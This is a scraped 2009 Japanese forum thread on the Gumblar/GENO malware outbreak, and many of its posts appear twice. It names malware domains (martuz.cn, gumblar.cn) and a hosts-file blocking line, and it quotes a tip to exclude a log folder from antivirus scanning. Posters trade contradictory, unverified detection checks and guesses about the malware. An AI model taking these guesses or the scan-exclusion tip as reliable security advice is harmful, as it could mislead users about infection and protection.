ポート135, 445を閉じたらネットに繋げなくなった。
元に戻そうにもプロパティが表示されない。
デバイスマネージャーやサービスの画面を閉じようとすると
プロパティを閉じろと言われるけど、Alt+Tabで探しても見つからない。
それにコンパネの右半分が真っ白。データフォルダの方は正常に表示されるのに。
誰か助けてください。
353 :192.168.0.774:2009/05/17(日) 19:32:01 ID:6zykGUMd0
>>350
まだ安心できない
まだ安心できない
354 :192.168.0.774:2009/05/17(日) 19:33:43 ID:OKDvuiXi0
ESCなりALT+F4なりで全部終了させて再起動したのかね
右半分が真っ白とか一時的な描画異常なんて誰でも経験する事で
再起動すればまず直る
再起動しても同じというならシラネ
右半分が真っ白とか一時的な描画異常なんて誰でも経験する事で
再起動すればまず直る
再起動しても同じというならシラネ
355 :192.168.0.774:2009/05/17(日) 19:34:19 ID:MP/sWvjo0
356 :192.168.0.774:2009/05/17(日) 19:34:38 ID:4g69K7//0
hxxp://skyhighpremium■com
ここもかな。チェッカーでは1000%とでた
アクセスしたくないし、ソースチェッカー規制くらってる
ここもかな。チェッカーでは1000%とでた
アクセスしたくないし、ソースチェッカー規制くらってる
357 :192.168.0.774:2009/05/17(日) 19:35:22 ID:DAUhxtRJ0
>>344
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
358 :192.168.0.774:2009/05/17(日) 19:45:27 ID:0KCBdJWL0
612 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:43:11 ID:I820zXBQ0
http://pc12.2ch.net/test/read.cgi/software/1240881087/611
611 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:30:30 ID:/KeDK9cs0
noscriptの「ブックマークから開いたサイトを許可する」って
履歴とブックマークの管理のウィンドウの履歴から開いても適用されるんだな
www.seibidoshuppan.co.jpここを開き直そうとしたらFlashが再生されたからうんこ漏らしたぜ・・・
martuz.cnを弾いてくれたから事なきだったけど
一応気になったからコピペ
そもそも「ブックマークから開いたサイトを許可する」はチェック入れるべきじゃないと思うけど
http://pc12.2ch.net/test/read.cgi/software/1240881087/611
611 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:30:30 ID:/KeDK9cs0
noscriptの「ブックマークから開いたサイトを許可する」って
履歴とブックマークの管理のウィンドウの履歴から開いても適用されるんだな
www.seibidoshuppan.co.jpここを開き直そうとしたらFlashが再生されたからうんこ漏らしたぜ・・・
martuz.cnを弾いてくれたから事なきだったけど
一応気になったからコピペ
そもそも「ブックマークから開いたサイトを許可する」はチェック入れるべきじゃないと思うけど
360 :192.168.0.774:2009/05/17(日) 19:50:13 ID:7TaPV4fL0
>>358
サンキュー
サンキュー
361 :192.168.0.774:2009/05/17(日) 19:51:58 ID:4g69K7//0
>>358
^w^;
^w^;
362 :192.168.0.774:2009/05/17(日) 19:57:17 ID:OKDvuiXi0
>>359
今内容見てきたがRemote Procedure Call停止って普通しないんじゃね?
そもそもあの内容が正しいかどうかも分からんから試す気にもならん
ただ135/445を閉じた方がいいのは事実なので自分はルータ側で閉じている
(と言うよりデフォルトで閉じられてたが)
元々あちらの板はID出ないし情報信用出来ないよ、見る価値無い
今内容見てきたがRemote Procedure Call停止って普通しないんじゃね?
そもそもあの内容が正しいかどうかも分からんから試す気にもならん
ただ135/445を閉じた方がいいのは事実なので自分はルータ側で閉じている
(と言うよりデフォルトで閉じられてたが)
元々あちらの板はID出ないし情報信用出来ないよ、見る価値無い
363 :192.168.0.774:2009/05/17(日) 20:13:01 ID:MpyKmePW0 BE:660438427-2BP(0)
なんだかいろいろご迷惑をおかけしております
>まとめ(黒)が見れない
急激にアクセス増えたので鯖が死にそうになってるみたいです
15時からの5時間でリファラーが2000件以上増えました
>メニューのリンクがおかしい
修正しました
>まとめ(黒)が見れない
急激にアクセス増えたので鯖が死にそうになってるみたいです
15時からの5時間でリファラーが2000件以上増えました
>メニューのリンクがおかしい
修正しました
364 :192.168.0.774:2009/05/17(日) 20:17:00 ID:4g69K7//0
>>188
AVG Anti-Virus Version 86
ttp://pc11.2ch.net/test/read.cgi/sec/1240905473/3
Q5. 2chのログにウィルスが検出されたんですけど
A5. ログに貼られたコードだけではPC内で感染行動をおこすことはできないので無害です。
AVG User Interface → ツール → 高度な設定 → 常駐シールド → 例外 に
ログフォルダを追加することで回避できます。
AVG Anti-Virus Version 86
ttp://pc11.2ch.net/test/read.cgi/sec/1240905473/3
Q5. 2chのログにウィルスが検出されたんですけど
A5. ログに貼られたコードだけではPC内で感染行動をおこすことはできないので無害です。
AVG User Interface → ツール → 高度な設定 → 常駐シールド → 例外 に
ログフォルダを追加することで回避できます。
366 :192.168.0.774:2009/05/17(日) 20:24:12 ID:zfzbOIpv0
367 :192.168.0.774:2009/05/17(日) 20:25:08 ID:sDfaXn0wO
なぜGENOまとめWikiが劇重いんですか
368 :192.168.0.774:2009/05/17(日) 20:27:26 ID:sDfaXn0wO
>>363見て了解しました。無意味なレス消費して大変申し訳ないです。
369 :192.168.0.774:2009/05/17(日) 20:28:09 ID:OKDvuiXi0
>>365
この辺でいいんでない?
【マジレス】超初心者の質問に答えるスレ113【エスパー】
http://pc12.2ch.net/test/read.cgi/win/1241574086/
質問の基本だけど、何をしたかは勿論OSやその他環境等なるべく細かく書くようにね
その方が回答者も適切な回答を提示しやすいから
この辺でいいんでない?
【マジレス】超初心者の質問に答えるスレ113【エスパー】
http://pc12.2ch.net/test/read.cgi/win/1241574086/
質問の基本だけど、何をしたかは勿論OSやその他環境等なるべく細かく書くようにね
その方が回答者も適切な回答を提示しやすいから
371 :192.168.0.774:2009/05/17(日) 20:40:21 ID:MP/sWvjo0
2009 05/17 hostsファイルの古いドメイン二つを消去
martuz.cn一行でいいのね。もう旅に出ます。
martuz.cn一行でいいのね。もう旅に出ます。
372 :192.168.0.774:2009/05/17(日) 21:14:42 ID:W37Yk44D0
373 :192.168.0.774:2009/05/17(日) 21:17:02 ID:O8ZrwtGB0
有志が作って下さった
感染チェックツール
http://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認
ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。
感染チェックツール
http://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認
ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。
374 :192.168.0.774:2009/05/17(日) 21:19:06 ID:7TaPV4fL0
>>373
感染していた場合、cmd.exeを起動するのは危険とのことです。
感染していた場合、cmd.exeを起動するのは危険とのことです。
375 :192.168.0.774:2009/05/17(日) 21:23:32 ID:O8ZrwtGB0
>>374
それただのネタだったみたい。
それただのネタだったみたい。
376 :192.168.0.774:2009/05/17(日) 21:25:07 ID:61lOiijw0
まさに情報の錯綜って感じだなオイ
377 :192.168.0.774:2009/05/17(日) 21:25:21 ID:7TaPV4fL0
そうだったんだ。
というわけなので、まとめサイトの人修正お願いします。
というわけなので、まとめサイトの人修正お願いします。
378 :192.168.0.774:2009/05/17(日) 21:25:29 ID:4g69K7//0
あぬビスレポート見ればわかるけど
感染してて、不発だった場合
手動でcmdを実行すると火がつく可能性がある
感染してて、不発だった場合
手動でcmdを実行すると火がつく可能性がある
379 :192.168.0.774:2009/05/17(日) 21:25:35 ID:mNi/cx+s0
>>373
怖くて踏めない…
怖くて踏めない…
380 :192.168.0.774:2009/05/17(日) 21:33:04 ID:O8ZrwtGB0
381 :192.168.0.774:2009/05/17(日) 21:35:16 ID:U6FqnzDc0
>>363
ここに力を貸してもらえないか聞いてみたら?
幸せサーバープロジェクト 「アイデア・技術のある人募集中」★3
http://qb5.2ch.net/test/read.cgi/operate/1241361889/
ここに力を貸してもらえないか聞いてみたら?
幸せサーバープロジェクト 「アイデア・技術のある人募集中」★3
http://qb5.2ch.net/test/read.cgi/operate/1241361889/
382 :192.168.0.774:2009/05/17(日) 21:36:30 ID:M2s+iWsi0
>>379
これで何か起きた、って報告は聞かないから大丈夫w
これで何か起きた、って報告は聞かないから大丈夫w
383 :192.168.0.774:2009/05/17(日) 21:37:11 ID:WLY0wH0PO
>>373踏んだら感染した。
384 :192.168.0.774:2009/05/17(日) 21:38:33 ID:61lOiijw0
>>383
おせーよ携帯
おせーよ携帯
385 :192.168.0.774:2009/05/17(日) 21:38:50 ID:O8ZrwtGB0
>>383
嘘はいけません。
嘘はいけません。
386 :192.168.0.774:2009/05/17(日) 21:41:40 ID:N2pz4sCI0
なんともなかった
387 :192.168.0.774:2009/05/17(日) 21:55:41 ID:mNi/cx+s0
ほんとに? うう…
388 :192.168.0.774:2009/05/17(日) 22:01:24 ID:FwEBmaaZ0
正直ネット不慣れな俺には判別できんけど、ツール使わなくても確認はできるんだし安易に踏むべきじゃないのはわかる
389 :192.168.0.774:2009/05/17(日) 22:17:19 ID:xG23ce6c0
390 :192.168.0.774:2009/05/17(日) 22:18:38 ID:++vAYPLj0
391 :192.168.0.774:2009/05/17(日) 22:19:30 ID:BvZF1aRY0
亜種・新種が多すぎだからネタとも言い切れないのが困り物
392 :192.168.0.774:2009/05/17(日) 22:23:00 ID:FEBrgm5Z0
どっちにしろcmd実行で火噴いても、検出しても
クリーニンスコするだけだからいんじゃね
クリーニンスコするだけだからいんじゃね
393 :192.168.0.774:2009/05/17(日) 22:25:53 ID:D2jCgTYH0
気が向くたびにcmd起動させては安全を確認している俺がいる。
ニフティの公式HPが感染のデマには心底焦ったからなぁ。
ニフティの公式HPが感染のデマには心底焦ったからなぁ。
394 :192.168.0.774:2009/05/17(日) 22:28:02 ID:FEBrgm5Z0
ニフティのレンタル鯖だっけ?
395 :192.168.0.774:2009/05/17(日) 22:29:58 ID:hMuH46V60
正直怖くて、閲覧できません><
一応アドビは最新にしてるけど、やっぱりcmd起動してばっかりいるw
一応アドビは最新にしてるけど、やっぱりcmd起動してばっかりいるw
396 :192.168.0.774:2009/05/17(日) 22:30:44 ID:TTgW4pHv0
397 :192.168.0.774:2009/05/17(日) 22:34:01 ID:5b9h61kx0
sqlsodbc.chmのサイズが1,323
コマンドプロンプトとレジストリは開くんだけど・・・
このウィルスって感染してたら例えばどんな被害があるの?
まじ泣きそうなんだが
コマンドプロンプトとレジストリは開くんだけど・・・
このウィルスって感染してたら例えばどんな被害があるの?
まじ泣きそうなんだが
398 :192.168.0.774:2009/05/17(日) 22:37:40 ID:T9pTie3x0
399 :192.168.0.774:2009/05/17(日) 22:38:11 ID:q8u6cZFi0
400 :192.168.0.774:2009/05/17(日) 22:38:11 ID:BvZF1aRY0
自分のHP持ってなければ再起動した時点でPC終了、クリーンインストール以外の駆除手段無しって程度
HP持ってた場合気づかず更新するとそこがまた感染源に
HP持ってた場合気づかず更新するとそこがまた感染源に
401 :ひみつの文字列さん:2024/04/28(日) 12:36:55 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
402 :192.168.0.774:2009/05/17(日) 22:41:35 ID:sXGsF7Ez0
マジでか…
sqlsodbc.chmのサイズが変わらないって話もなかったっけ?
気のせい?デマ?
判断材料がないとかやばすぎる
sqlsodbc.chmのサイズが変わらないって話もなかったっけ?
気のせい?デマ?
判断材料がないとかやばすぎる
403 :192.168.0.774:2009/05/17(日) 22:42:06 ID:7TaPV4fL0
しかし今までこの形式のウイルスが出てこなかった(のかな?)
のが不思議なのかもしれないね。
のが不思議なのかもしれないね。
404 :192.168.0.774:2009/05/17(日) 22:44:36 ID:5b9h61kx0
>>399
>>400
ありがとう
実は4月ごろに変なPCサイト見てからIEが強制終了するようになって
システム復元したらなおったんだよね。でも現在Windows update
に繋がらないから変だとは思ってた。
とりあえず今日は回線切ってクリーンインストールする
クレカはもってないから大丈夫なのかな?
>>400
ありがとう
実は4月ごろに変なPCサイト見てからIEが強制終了するようになって
システム復元したらなおったんだよね。でも現在Windows update
に繋がらないから変だとは思ってた。
とりあえず今日は回線切ってクリーンインストールする
クレカはもってないから大丈夫なのかな?
>>397
>401の通り、sqlsodbc.chmのサイズが1,323バイトは、思いっきりアウトです。
可哀想ですが、現状では感染後に検出・駆除できるソフトが無いので、データを退避の上
再インストールするしか...
私の方で確認した結果では、SymantecもKasperskyも、オンラインスキャンでは感染していることが
確認できません(感染していても、何も検出しない)ので、注意お願いします。
# 今、マイクロソフトのオンラインスキャンを確認中。 マイクロソフトでダメなら、オンラインスキャンでは
多分、何やっても検知できない。
>401の通り、sqlsodbc.chmのサイズが1,323バイトは、思いっきりアウトです。
可哀想ですが、現状では感染後に検出・駆除できるソフトが無いので、データを退避の上
再インストールするしか...
私の方で確認した結果では、SymantecもKasperskyも、オンラインスキャンでは感染していることが
確認できません(感染していても、何も検出しない)ので、注意お願いします。
# 今、マイクロソフトのオンラインスキャンを確認中。 マイクロソフトでダメなら、オンラインスキャンでは
多分、何やっても検知できない。
406 :192.168.0.774:2009/05/17(日) 22:48:32 ID:Zy7kEHYt0
初歩的な質問で申し訳ないのですが……
ウイルス対策としてhostsファイルをNotepadで開いて「127.0.0.1 martuz.cn」等を
書き込もうとしたんですが、すでにファイルに書き込まれているホスト名はアルファベット順に
並んでいるのですが、書き込むホスト名もその中にアルファベット順にしたがって
書き込んだ方がいいのでしょうか?
ウイルス対策としてhostsファイルをNotepadで開いて「127.0.0.1 martuz.cn」等を
書き込もうとしたんですが、すでにファイルに書き込まれているホスト名はアルファベット順に
並んでいるのですが、書き込むホスト名もその中にアルファベット順にしたがって
書き込んだ方がいいのでしょうか?
407 :192.168.0.774:2009/05/17(日) 22:48:54 ID:FwEBmaaZ0
>>404
windows updateに繋がらないって時点でアウトだろ・・・
windows updateに繋がらないって時点でアウトだろ・・・
408 :192.168.0.774:2009/05/17(日) 22:49:01 ID:IyeP3TLN0
u.bat 今はe.batか。こいつは去年の秋ぐらいからあるみたい
readerの脆弱性指摘も去年の秋だったかな
genoウイルス感染報告は海外で今年3/18ぐらいだったかな
ソース探してくるのがめんどくさいがそんな感じだったと記憶してる
readerの脆弱性指摘も去年の秋だったかな
genoウイルス感染報告は海外で今年3/18ぐらいだったかな
ソース探してくるのがめんどくさいがそんな感じだったと記憶してる
409 :192.168.0.774:2009/05/17(日) 22:49:10 ID:++vAYPLj0
410 :192.168.0.774:2009/05/17(日) 22:51:04 ID:IyeP3TLN0
190 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/05/17(日) 01:51:35
>>178
>sqlsodbc.chmを書き換えて、何に転用しているかもよくわかってない。
ざっと見たところ、キーロガーのログ部分だね。おいらが見たのは反対からセーブしているやつだった。たとえば
あいうえお
は
おえういあ
って保存されてるよ。メモ帳なんかで開いてみれば、何が盗まれたかの一部はわかるんじゃないかな
>>178
>sqlsodbc.chmを書き換えて、何に転用しているかもよくわかってない。
ざっと見たところ、キーロガーのログ部分だね。おいらが見たのは反対からセーブしているやつだった。たとえば
あいうえお
は
おえういあ
って保存されてるよ。メモ帳なんかで開いてみれば、何が盗まれたかの一部はわかるんじゃないかな
411 :192.168.0.774:2009/05/17(日) 22:51:08 ID:sXGsF7Ez0
412 :192.168.0.774:2009/05/17(日) 22:52:46 ID:IyeP3TLN0
感染してからsqlsodbc.chmをメモ帳を開けば面白いものが見れるのか?
413 :192.168.0.774:2009/05/17(日) 22:52:58 ID:FSY0bnP50
うっとおしさっていう点では、ここ数年稀に見るウイルスだな
うっひょう、カスペなんかもダメなのか。
さっき(念の為)オンラインでフルスキャンしたばかりだと言うのに。
>1の症状らは皆無だし様子見るかな、avastがブロックしたと信じてw
さっき(念の為)オンラインでフルスキャンしたばかりだと言うのに。
>1の症状らは皆無だし様子見るかな、avastがブロックしたと信じてw
415 :192.168.0.774:2009/05/17(日) 22:53:45 ID:mpI/NNW20
有志が作って下さった
感染チェックツール
http://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認
ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。
チェック後の起動画面。
http://www.rupan.net/uploader/download/1242563513.png
感染チェックツール
http://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認
ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。
チェック後の起動画面。
http://www.rupan.net/uploader/download/1242563513.png
416 :192.168.0.774:2009/05/17(日) 22:53:59 ID:rsd1W3Tn0
>>401
明らかに目立った不具合とかはありますか?
明らかに目立った不具合とかはありますか?
417 :192.168.0.774:2009/05/17(日) 22:55:53 ID:++vAYPLj0
418 :192.168.0.774:2009/05/17(日) 22:56:16 ID:sDfaXn0wO
>>401
横レスですみませんが、
つまり、ttp://wepawet.cs.ucsb.edu/index.php
などでソースを見たとき、martuz.cnやgumblar.cnが無くても感染の疑いがあるという事ですか?
横レスですみませんが、
つまり、ttp://wepawet.cs.ucsb.edu/index.php
などでソースを見たとき、martuz.cnやgumblar.cnが無くても感染の疑いがあるという事ですか?
419 :192.168.0.774:2009/05/17(日) 22:59:44 ID:1tk6kEt+0
>>418
なんでそうなるん?
なんでそうなるん?
420 :192.168.0.774:2009/05/17(日) 23:04:10 ID:vIxScWxq0
chmがキーロガーのログ部分なのか?
ちょっくらVMで感染してくるか。
ちょっくらVMで感染してくるか。
421 :192.168.0.774:2009/05/17(日) 23:05:11 ID:QXwoDhGF0
ぷりんてぃんがGENOに汚染
422 :192.168.0.774:2009/05/17(日) 23:05:49 ID:sXGsF7Ez0
感染者がサイト持ってた場合、サイトが書き換わるのは確実
それ以外の症状は出るか不明
感染がわからないこともあるかも
CPU使用率とか目安にならない?
それ以外の症状は出るか不明
感染がわからないこともあるかも
CPU使用率とか目安にならない?
423 :192.168.0.774:2009/05/17(日) 23:05:50 ID:1tk6kEt+0
>>420
キーロガーじゃなくてsniffingしてる。
キーロガーじゃなくてsniffingしてる。
>>410
キーロガーのログなのかなぁ...私が確保したファイルは、中身思いっきり無意味な文字列だった。
何か暗号化されてるのか、それとも仮想PCで何も入っていないから無意味な文字列になったのか。
あと、マイクロソフトのOncareオンラインスキャン終わった。
...微妙。これ、レポートが出力されないから詳細がわからなすぎる。とりあえず、
1.展開された後のウイルス本体ファイルは削除された。(>401で、muvl.nugの方)
http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1aで
MicrosoftがTrojan:Win32/Daonol.Dとして本体検出したので、行けるか?とおもったけど、
一応潜伏後の本体を捕まえそう。(絶対ではないと思うけど。)
2.レジストリの方に登録されたauxのマルウェア実行登録は、そのまま残っている。
少なくとも、SymantecやKasperskyよりは仕事してるようだが、『 ファイルを無断で削除 』してくれた
ので他人に勧めにくい。 (この感じだと、誤検出もばっさり無断で削除しそうな感じ。)
一応、試す人は自己責任で。 誤検出の時にばっさりやられても泣かない人だけに勧めます。
Microsoftのオンラインスキャン→ ttp://onecare.live.com/site/ja-jp/default.htm
キーロガーのログなのかなぁ...私が確保したファイルは、中身思いっきり無意味な文字列だった。
何か暗号化されてるのか、それとも仮想PCで何も入っていないから無意味な文字列になったのか。
あと、マイクロソフトのOncareオンラインスキャン終わった。
...微妙。これ、レポートが出力されないから詳細がわからなすぎる。とりあえず、
1.展開された後のウイルス本体ファイルは削除された。(>401で、muvl.nugの方)
http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1aで
MicrosoftがTrojan:Win32/Daonol.Dとして本体検出したので、行けるか?とおもったけど、
一応潜伏後の本体を捕まえそう。(絶対ではないと思うけど。)
2.レジストリの方に登録されたauxのマルウェア実行登録は、そのまま残っている。
少なくとも、SymantecやKasperskyよりは仕事してるようだが、『 ファイルを無断で削除 』してくれた
ので他人に勧めにくい。 (この感じだと、誤検出もばっさり無断で削除しそうな感じ。)
一応、試す人は自己責任で。 誤検出の時にばっさりやられても泣かない人だけに勧めます。
Microsoftのオンラインスキャン→ ttp://onecare.live.com/site/ja-jp/default.htm
425 :192.168.0.774:2009/05/17(日) 23:08:41 ID:vIxScWxq0
>>423
盗聴?それだと俺なんかじゃ中身みるのは難しそうだな
盗聴?それだと俺なんかじゃ中身みるのは難しそうだな
426 :192.168.0.774:2009/05/17(日) 23:11:13 ID:0KCBdJWL0
sniffingしてるとして、どこに送ってるんだろ?
やっぱりmartuz.cn?
やっぱりmartuz.cn?
427 :192.168.0.774:2009/05/17(日) 23:13:17 ID:1a+FrLCg0
428 :192.168.0.774:2009/05/17(日) 23:16:12 ID:++vAYPLj0
>>427
Genoさんとは別物です
Genoさんとは別物です
429 :192.168.0.774:2009/05/17(日) 23:18:28 ID:vIxScWxq0
>>427
あれは中華やチョンのマルウェア仕込んだサイトじゃなかったか
あれは中華やチョンのマルウェア仕込んだサイトじゃなかったか
430 :192.168.0.774:2009/05/17(日) 23:19:29 ID:SfYViNhDO
あーやばいなー
今PCおとして携帯でレスしてるんだけど今日エクスプローラ二回おちてフリーズも二回したからなー
感染してるかもしんねー
今PCおとして携帯でレスしてるんだけど今日エクスプローラ二回おちてフリーズも二回したからなー
感染してるかもしんねー
431 :192.168.0.774:2009/05/17(日) 23:25:36 ID:1a+FrLCg0
>>429
それにしちゃ薄く広いのが気になる。
FF11、RO、リネ2くらいのメジャーなのはともかく、マビノギやグラナド、MoEとかのマイナーゲーでも被害が出てる。
(ルナティア、完美世界は運営の失態なので除外)
それにしちゃ薄く広いのが気になる。
FF11、RO、リネ2くらいのメジャーなのはともかく、マビノギやグラナド、MoEとかのマイナーゲーでも被害が出てる。
(ルナティア、完美世界は運営の失態なので除外)
432 :192.168.0.774:2009/05/17(日) 23:26:13 ID:vIxScWxq0
>>416
嫌なことに、特に異変がない。 cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe,レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。
あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。
これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。 同人板その他、パンデミック状態になったの理解できるわ。
嫌なことに、特に異変がない。 cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe,レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。
あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。
これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。 同人板その他、パンデミック状態になったの理解できるわ。
434 :192.168.0.774:2009/05/17(日) 23:28:07 ID:D2jCgTYH0
sqlsodbc.chmって、ヘルプファイルですよね?
なんでそんなとこの容量増やすんですか、このウィルス。
ヘルプの項目に嘘八百を追加するんですか?
なんでそんなとこの容量増やすんですか、このウィルス。
ヘルプの項目に嘘八百を追加するんですか?
437 :192.168.0.774:2009/05/17(日) 23:31:12 ID:FSY0bnP50
>>424
あくまで推測だけど、サイト書き換えようのFTPのアカウントとキーとアドレス情報の格納場所じゃないかと思う。
chmファイルのサイズが一定しないっていう情報を4月騒動の頃にまとめサイトで見たことがあるんだが、
それは、他の感染PCとキー情報のやり取りをして、情報が増えて行ってるからではないかと思う。
で、他の感染PCと一切交換を行っていない初期サイズが1323バイトとか。
もし、感染した人の中に、chmファイルのサイズが時とともに増加していったっていう情報があれば、その線を疑えると思う。
あくまで推測だけど、サイト書き換えようのFTPのアカウントとキーとアドレス情報の格納場所じゃないかと思う。
chmファイルのサイズが一定しないっていう情報を4月騒動の頃にまとめサイトで見たことがあるんだが、
それは、他の感染PCとキー情報のやり取りをして、情報が増えて行ってるからではないかと思う。
で、他の感染PCと一切交換を行っていない初期サイズが1323バイトとか。
もし、感染した人の中に、chmファイルのサイズが時とともに増加していったっていう情報があれば、その線を疑えると思う。
438 :192.168.0.774:2009/05/17(日) 23:31:27 ID:++vAYPLj0
>>431
RMTができれば日本での認知度なんて気にしてないのかもね
客がいれば利益は出るわけだしどのゲームでもやることは同じだし投資は少ないし
特定のターゲットにしぼるより広くやったほうがどれかが潰れても
被害を抑えられるかな
RMTができれば日本での認知度なんて気にしてないのかもね
客がいれば利益は出るわけだしどのゲームでもやることは同じだし投資は少ないし
特定のターゲットにしぼるより広くやったほうがどれかが潰れても
被害を抑えられるかな
439 :192.168.0.774:2009/05/17(日) 23:33:53 ID:0KCBdJWL0
440 :ひみつの文字列さん:2024/04/28(日) 12:36:55 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
441 :192.168.0.774:2009/05/17(日) 23:35:15 ID:FSY0bnP50
>>437の補足として、ウイルスを駆除したにも関わらず、FTPパスを変えてなかったら、
自サイトをウイルス誘導ページに書き換えられたっていう報告があるらしい。
そのため、感染PC同士でFTPアカウント情報のやり取りをしており、
どこかに保存しているっていう観点からそう推理してみた。
自サイトをウイルス誘導ページに書き換えられたっていう報告があるらしい。
そのため、感染PC同士でFTPアカウント情報のやり取りをしており、
どこかに保存しているっていう観点からそう推理してみた。
442 :192.168.0.774:2009/05/17(日) 23:36:01 ID:MP/sWvjo0
ただいま。
>>434>ヘルプの項目に嘘八百を追加するんですか?
かなりの危険をおかしてまで、たったそれだけの無意味なウイルスは作らないと思うがw
sqlsodbc.chm自体が書き換わったら容量変わるだろ?
じゃあ、おやすみなさい。
>>434>ヘルプの項目に嘘八百を追加するんですか?
かなりの危険をおかしてまで、たったそれだけの無意味なウイルスは作らないと思うがw
sqlsodbc.chm自体が書き換わったら容量変わるだろ?
じゃあ、おやすみなさい。
443 :192.168.0.774:2009/05/17(日) 23:36:19 ID:vIxScWxq0
初期スレからいるが、f639という文字列を見る度に感じるホッという安心感はなんなんだろう
俺だけか
俺だけか
444 :192.168.0.774:2009/05/17(日) 23:36:31 ID:0H7sjBwe0
とりあえずsqlsodbc.chmの更新日時は一年前になってるからOKですよね?
445 :192.168.0.774:2009/05/17(日) 23:37:21 ID:q8u6cZFi0
>>444
サイズも要確認
サイズも要確認
>>418
ソース見ただけでは感染しないよ。(苦笑
逆に、自分がサイトの管理者であった場合なら、自分が管理しているサイトに異常が無くても
感染している可能性はある。 これは、今の所
・sqlsodbc.chm のサイズを確認。→1,323バイトとか、ファイルが異常に小さくなっていたら確実にアウト
・ダブルクリックして、ヘルプファイルとして開けるか? → ダブルクリックして『壊れている』と表示されたらヤバイ。
→ sqlsodbc.chmをワードパッドなどで開いてみる。ファイルが開けて、中身がテキストデータに置き換わっていたらアウト。
ぐらいしか確認の方法が無い。 cmd.exeとレジストリエディタによる確認方法は、忘れた方が良い。
さて、危ないから感染した仮想PCはゴミ箱行きにします。
ソース見ただけでは感染しないよ。(苦笑
逆に、自分がサイトの管理者であった場合なら、自分が管理しているサイトに異常が無くても
感染している可能性はある。 これは、今の所
・sqlsodbc.chm のサイズを確認。→1,323バイトとか、ファイルが異常に小さくなっていたら確実にアウト
・ダブルクリックして、ヘルプファイルとして開けるか? → ダブルクリックして『壊れている』と表示されたらヤバイ。
→ sqlsodbc.chmをワードパッドなどで開いてみる。ファイルが開けて、中身がテキストデータに置き換わっていたらアウト。
ぐらいしか確認の方法が無い。 cmd.exeとレジストリエディタによる確認方法は、忘れた方が良い。
さて、危ないから感染した仮想PCはゴミ箱行きにします。
447 :192.168.0.774:2009/05/17(日) 23:37:48 ID:qCuFPmlW0
感染してるか気になって自分も調べたんですけど
XP SP3 でsqlsodbc.chm が無かった
nliteで削ったりしたからだと思うけど。
XP SP3 でsqlsodbc.chm が無かった
nliteで削ったりしたからだと思うけど。
448 :192.168.0.774:2009/05/17(日) 23:39:32 ID:OKDvuiXi0
>>447
2000で無い場合に作られるから多分XPでも挙動は同じじゃね?
2000で無い場合に作られるから多分XPでも挙動は同じじゃね?
449 :192.168.0.774:2009/05/17(日) 23:40:56 ID:qCuFPmlW0
450 :192.168.0.774:2009/05/17(日) 23:44:02 ID:++vAYPLj0
chmは操作かく乱用のダミーっぽいとのこと
ソースは検出可否報告スレ
ソースは検出可否報告スレ
451 :192.168.0.774:2009/05/17(日) 23:44:06 ID:j/5AZ8AK0
452 :192.168.0.774:2009/05/17(日) 23:44:47 ID:rsd1W3Tn0
>>433
ありがとう。やっぱりもう重いだとかcmdが開かないとかそんな確認方法は無駄かも「しれない」のね。
